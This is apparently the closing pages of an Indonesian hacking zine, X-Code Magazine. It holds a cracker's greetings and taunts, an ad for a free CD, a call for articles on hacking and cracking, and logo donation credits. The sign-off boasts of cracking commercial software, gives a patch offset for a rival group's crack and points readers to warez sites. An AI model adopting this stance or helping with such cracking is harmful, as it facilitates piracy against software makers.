underground-ku.
NeMeSiS_ByTe
greetz to :
All 311t3 m45t3r my Sunbeam, Teman-teman yang kenal Aku di
malang
dan di seluruh Indonesia (kalau ada job kasih tahu dong, Aku bingung
cari kerja
nih?! Please? Kalau bisa kerjaan di perusahaan ternak aja, but
komputer lg jg gpp koq, lumayan buat nambah dana ke warnet sekedar
cari software buat “dianalisa secara bijak” dan cari
bug baru),
#AntiHackerLink+#MalangHackerLink+#Jasakom knp skg jd gak
asik lg dan
byk org cuek+sombong masuk situ?!! FUCK YOU ALL!!, mas sakitjiwa,
mas S’to Wijaya, mas Kurniawan ^family_code^, toyok+Cmaster4 (w r
u, man?), mas kangtatantakwa engine domain dossier-nya kuadopsi
kalo mau Saya punya Site Engine Google Hacker, tukeran?, wayne
rudi+ k0nd0r_cecunguk (bingung or vakum or DEATH?), All
Underground Cracker ‘n Hacker keep rockin’, dude..!!

NeMeSiS_ByTe
commentz to :
• Dachshund Software, secure your software before it
change become warez..sorry about this shit!
• Cracker Group TEAM AGAiN interupt for your new crack
release, EXE Script v2.1.1, don’t touch the silent at 33DB53
otherwise it won’t work better, dude!!!
• You can touch all NeMeSiS_ByTe crack release outside of the
official site at astalavista, freeserial, etc.

----------------------------------------------------
EOF--------------------------------------------------
DapatkanCD YogyafreePro 7 Series
Gratis*
melalui distributor kami di Yogya.

Cover Awal Cover

belakang Various

pic for cover

CD Yogyafree Gratis* dapat anda dapatkan di :


- Desy : d_see2586@[Link]
- Mas Agus : masagus@[Link]
- Pras : [Link]@[Link]
*Selama Persediaan masih ada
Cara menjadi penulis X-Code Magazine No
4

Isi materi yang dapat anda tulis :

- Kategori Komputer umum


- Kategori Pemograman
- Kategori Hacking Windows / Linux / FreeBSD / BeOS Etc
- Kategori Cracking

Kirimkan tulisan anda ke :


- Redaksi X-Code Magazine : yk_family_code@[Link]

Seleksi Artikel
- Artikel diseleksi, jika artikel anda sesuai dengan kriteria kami
maka kami
akan memasang artikel anda di X-Code

Magazine. Terima kasih atas perhatiannya


Donasi Logo dan wallpaper oleh para X-
Coders

Logo Resmi X-Code - Modifikasi ^family_code^ dari wallpaper donasi


Bugscuzy

Logo lama X-Code yang dibuat oleh ^family_code^


Donasi Wallpaper oleh Bugscuzy
Donasi Logo oleh HKX

Donasi Wallpaper oleh Bugscuzy

Donasi Logo oleh nofear^71


Donasi Wallpaper oleh Bugscuzy

Donasi Wallpaper oleh Bugscuzy

Donasi Wallpaper oleh Bugscuzy


Donasi Wallpaper oleh Bugscuzy

Donasi Wallpaper oleh Bugscuzy

Donasi Logo oleh HKX


Donasi logo oleh w4w4n

Donasi logo oleh w4w4n

Donasi logo oleh w4w4n


Donasi logo oleh Genrow's

Donasi logo oleh ^rumput_kering^

Donasi Logo dari Evan The Ripp3r


Donasi Logo dari HKX

Donasi Logo dari HKX

Donasi Logo dari JerryMaheswara


Donasi Logo dari Evan The Ripp3r

Donasi dari Bugscuzy

Donasi dari Bugscuzy


Donasi wallpaper dari Bugscuzy

Donasi logo dari JerryMaheswara

Donasi logo dari JerryMaheswara


Donasi logo dari JerryMaheswara

Donasi logo dari JerryMaheswara

Donasi logo dari g3mBuzh_H!muR@


Donasi logo dari yulle alle

Donasi logo dari yulle alle

Donasi logo dari yulle alle


Donasi logo dari Blue Sky
Banner for Community Support :

[Link] – [Link]

[Link] – [Link]
TsunamiShell –

[Link]

Anda mungkin juga menyukai